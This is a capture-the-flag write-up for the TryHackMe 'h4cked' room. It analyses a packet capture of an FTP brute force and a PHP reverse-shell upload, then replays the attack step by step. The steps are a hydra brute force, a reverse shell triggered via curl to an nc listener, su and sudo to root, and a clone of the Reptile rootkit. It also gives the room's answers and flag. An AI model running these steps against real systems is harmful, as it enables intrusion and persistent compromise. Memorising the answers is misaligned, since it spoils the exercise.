TryHackMe-h4cked
Find out what happened by analysing a .pcap file and hack your way back into the machine
It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.
Task 1 Oh no! We’ve been hacked!
The attacker is trying to log into a specific service. What service is this?
Open the pcapng file in Wireshark and go to Statistics > Protocol Hierarchy. It will reveal that the application layer is FTP.
Answer: FTP
There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
Answer: hydra
The attacker is trying to log on with a specific username. What is the username?
Right click on the 1st frame and follow the TCP stream to reveal the following content:
220 Hello FTP World! USER jenny 331 Please specify the password. PASS password 530 Login incorrect. USER jenny 331 Please specify the password. PASS 666666 530 Login incorrect.
The attacker keeps brute forcing jenny
’s account.
Answer: jenny
What is the user’s password?
In Wireshark, filter the frames that match the FTP protocol only by entering “FTP” in the search bar. Scroll down until you see “Response: 230 Login successful.” (frame #395). Right click on the frame and follow the TCP stream:
220 Hello FTP World! USER jenny 331 Please specify the password. PASS password123 230 Login successful. SYST 215 UNIX Type: L8 PWD 257 "/var/www/html" is the current directory PORT 192,168,0,147,225,49 200 PORT command successful. Consider using PASV. LIST -la 150 Here comes the directory listing. 226 Directory send OK. TYPE I 200 Switching to Binary mode. PORT 192,168,0,147,196,163 200 PORT command successful. Consider using PASV. STOR shell.php 150 Ok to send data. 226 Transfer complete. SITE CHMOD 777 shell.php 200 SITE CHMOD command ok. QUIT 221 Goodbye.
Answer: password123
What is the current FTP working directory after the attacker logged in?
The current working directory is shown in the same stream as above.
Answer: /var/www/html
The attacker uploaded a backdoor. What is the backdoor’s filename?
Information still on the same TCP stream.
Answer; shell.php
The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
At the bottom of the TCP stream window, use the arrow to navigate to the other streams and go 2 streams forward (stream #18) to reveal the content of the shell.php
script. This is a famous PHP reverse shell hosted by pentestmonkey, and going through the comments in the file will reveal the URL where the script is hosted.
Answer: http://pentestmonkey.net/tools/php-reverse-shell
Which command did the attacker manually execute after getting a reverse shell?
Navigate to stream #20 to reveal the below content:
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 22:26:54 up 2:21, 1 user, load average: 0.02, 0.07, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT jenny tty1 - 20:06 37.00s 1.00s 0.14s -bash uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ ls -la total 1529956 drwxr-xr-x 23 root root 4096 Feb 1 19:52 . drwxr-xr-x 23 root root 4096 Feb 1 19:52 .. drwxr-xr-x 2 root root 4096 Feb 1 20:11 bin drwxr-xr-x 3 root root 4096 Feb 1 20:15 boot drwxr-xr-x 18 root root 3880 Feb 1 20:05 dev drwxr-xr-x 94 root root 4096 Feb 1 22:23 etc drwxr-xr-x 3 root root 4096 Feb 1 20:05 home lrwxrwxrwx 1 root root 34 Feb 1 19:52 initrd.img -> boot/initrd.img-4.15.0-135-generic lrwxrwxrwx 1 root root 33 Jul 25 2018 initrd.img.old -> boot/initrd.img-4.15.0-29-generic drwxr-xr-x 22 root root 4096 Feb 1 22:06 lib drwxr-xr-x 2 root root 4096 Feb 1 20:08 lib64 drwx------ 2 root root 16384 Feb 1 19:49 lost+found drwxr-xr-x 2 root root 4096 Jul 25 2018 media drwxr-xr-x 2 root root 4096 Jul 25 2018 mnt drwxr-xr-x 2 root root 4096 Jul 25 2018 opt dr-xr-xr-x 117 root root 0 Feb 1 20:23 proc drwx------ 3 root root 4096 Feb 1 22:20 root drwxr-xr-x 29 root root 1040 Feb 1 22:23 run drwxr-xr-x 2 root root 12288 Feb 1 20:11 sbin drwxr-xr-x 4 root root 4096 Feb 1 20:06 snap drwxr-xr-x 3 root root 4096 Feb 1 20:07 srv -rw------- 1 root root 1566572544 Feb 1 19:52 swap.img dr-xr-xr-x 13 root root 0 Feb 1 20:05 sys drwxrwxrwt 2 root root 4096 Feb 1 22:25 tmp drwxr-xr-x 10 root root 4096 Jul 25 2018 usr drwxr-xr-x 14 root root 4096 Feb 1 21:54 var lrwxrwxrwx 1 root root 31 Feb 1 19:52 vmlinuz -> boot/vmlinuz-4.15.0-135-generic lrwxrwxrwx 1 root root 30 Jul 25 2018 vmlinuz.old -> boot/vmlinuz-4.15.0-29-generic $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@wir3:/$ su jenny su jenny Password: password123 jenny@wir3:/$ sudo -l sudo -l [sudo] password for jenny: password123 Matching Defaults entries for jenny on wir3: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User jenny may run the following commands on wir3: (ALL : ALL) ALL jenny@wir3:/$ sudo su sudo su root@wir3:/# whoami whoami root root@wir3:/# cd cd root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git git clone https://github.com/f0rb1dd3n/Reptile.git Cloning into 'Reptile'... remote: Enumerating objects: 217, done..[K remote: Counting objects: 0% (1/217).[K remote: Counting objects: 1% (3/217).[K remote: Counting objects: 2% (5/217).[K remote: Counting objects: 3% (7/217).[K remote: Counting objects: 4% (9/217).[K remote: Counting objects: 5% (11/217).[K [REDACTED] Resolving deltas: 98% (491/499) Resolving deltas: 99% (495/499) Resolving deltas: 100% (499/499) Resolving deltas: 100% (499/499), done. root@wir3:~# cd Reptile cd Reptile root@wir3:~/Reptile# ls -la ls -la total 44 drwxr-xr-x 7 root root 4096 Feb 1 22:27 . drwx------ 4 root root 4096 Feb 1 22:27 .. drwxr-xr-x 2 root root 4096 Feb 1 22:27 configs drwxr-xr-x 8 root root 4096 Feb 1 22:27 .git -rw-r--r-- 1 root root 8 Feb 1 22:27 .gitignore -rw-r--r-- 1 root root 1922 Feb 1 22:27 Kconfig drwxr-xr-x 7 root root 4096 Feb 1 22:27 kernel -rw-r--r-- 1 root root 1852 Feb 1 22:27 Makefile -rw-r--r-- 1 root root 2183 Feb 1 22:27 README.md drwxr-xr-x 4 root root 4096 Feb 1 22:27 scripts drwxr-xr-x 6 root root 4096 Feb 1 22:27 userland root@wir3:~/Reptile# make make make[1]: Entering directory '/root/Reptile/userland' Makefile:10: ../.config: No such file or directory make[1]: *** No rule to make target '../.config'. Stop. make[1]: Leaving directory '/root/Reptile/userland' Makefile:56: recipe for target 'userland_bin' failed make: *** [userland_bin] Error 2 root@wir3:~/Reptile#
The first command that the attacker entered was whoami
.
What is the computer’s hostname?
This information is revealed in this banner:
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Answer: wir3
Which command did the attacker execute to spawn a new TTY shell?
Answer: python3 -c 'import pty; pty.spawn("/bin/bash")'
Which command was executed to gain a root shell?
The following lines will answer the question:
jenny@wir3:/$ sudo su sudo su root@wir3:/# whoami whoami root
Answer: sudo su
The attacker downloaded something from GitHub. What is the name of the GitHub project?
The attacker is downloading a content from github:
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
Answer: Reptile
The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Answer: rootkit
Hack your way back into the machine
The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!
Run Hydra (or any similar tool) on the FTP service. The attacker might not have chosen a complex password. You might get lucky if you use a common word list.
First thing is to scan the target. there are 2 open ports, 1 of which is FTP.
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works
Let’s replicate the hydra attack we’ve analyzed previously:
kali@kali:/data/hacked/files$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.255.63 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-04 07:51:28 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ftp://10.10.255.63:21/ [21][ftp] host: 10.10.255.63 login: jenny password: 987654321 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-04 07:51:53
Jenny’s password is 987654321
Change the necessary values inside the web shell and upload it to the webserver
Connect as jenny
. You’ll notice that we have write access to the folder. Download the PHP reverse shell from pentestmonkey modify the IP and port, and upload it to the server.
kali@kali:/data/hacked/files$ ftp 10.10.255.63 Connected to 10.10.255.63. 220 Hello FTP World! Name (10.10.255.63:kali): jenny 331 Please specify the password. Password: 987654321 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 1000 1000 4096 Feb 01 22:26 . drwxr-xr-x 3 0 0 4096 Feb 01 21:54 .. -rw-r--r-- 1 1000 1000 10918 Feb 01 21:54 index.html -rwxrwxrwx 1 1000 1000 5493 Feb 01 22:26 shell.php 226 Directory send OK. ftp>
Now, let’s upload our reverse shell and give it all privileges:
ftp> put rev.php local: rev.php remote: rev.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5492 bytes sent in 0.00 secs (106.8894 MB/s) ftp> chmod 777 rev.php 200 SITE CHMOD command ok.
Create a listener on the designated port on your attacker machine. Execute the web shell by visiting the .php file on the targeted web server.
Let’s start a listener on port 4444 (or whatever port you have specified in the PHP reverse shell).
kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444 listening on [any] 4444 ...
And call our reverse shell:
kali@kali:/data/hacked/files$ curl -s http://10.10.255.63/rev.php
You should now have a reverse shell.
kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.255.63] 48734 Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 06:12:03 up 57 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off python3 -c "import pty;pty.spawn('/bin/bash')" www-data@wir3:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Become root!
Once connected as www-data
, we want to move laterally to jenny
using the password found previously (same password as for FTP).
www-data@wir3:/$ su jenny Password: 987654321 jenny@wir3:/$
Now, we check jenny’s privileges and see that we can become root:
jenny@wir3:/$ sudo -l [sudo] password for jenny: 987654321 Matching Defaults entries for jenny on wir3: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User jenny may run the following commands on wir3: (ALL : ALL) ALL jenny@wir3:/$ sudo -s root@wir3:/#
Read the flag.txt file inside the Reptile directory
root@wir3:/# cd /root root@wir3:/# ls -la ls -la total 20 drwx------ 3 root root 4096 Feb 2 10:23 . drwxr-xr-x 22 root root 4096 Feb 2 10:28 .. lrwxrwxrwx 1 root root 9 Feb 2 10:20 .bash_history -> /dev/null -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwxr-xr-x 7 root root 4096 Feb 2 10:23 Reptile root@wir3:/# cd Reptile cd Reptile root@wir3:/# ls -la ls -la total 44 drwxr-xr-x 7 root root 4096 Feb 2 10:23 . drwx------ 3 root root 4096 Feb 2 10:23 .. drwxr-xr-x 2 root root 4096 Feb 1 22:27 configs -rw-r--r-- 1 root root 33 Feb 2 10:23 flag.txt -rw-r--r-- 1 root root 1922 Feb 1 22:27 Kconfig drwxr-xr-x 7 root root 4096 Feb 1 22:27 kernel -rw-r--r-- 1 root root 1852 Feb 1 22:27 Makefile drwxr-xr-x 2 root root 4096 Feb 1 22:28 output -rw-r--r-- 1 root root 2183 Feb 1 22:27 README.md drwxr-xr-x 4 root root 4096 Feb 1 22:27 scripts drwxr-xr-x 6 root root 4096 Feb 1 22:27 userland root@wir3:/# cat flag.txt cat flag.txt ebcefd66ca4b559d17b440b6e67fd0fd
Root flag: ebcefd66ca4b559d17b440b6e67fd0fd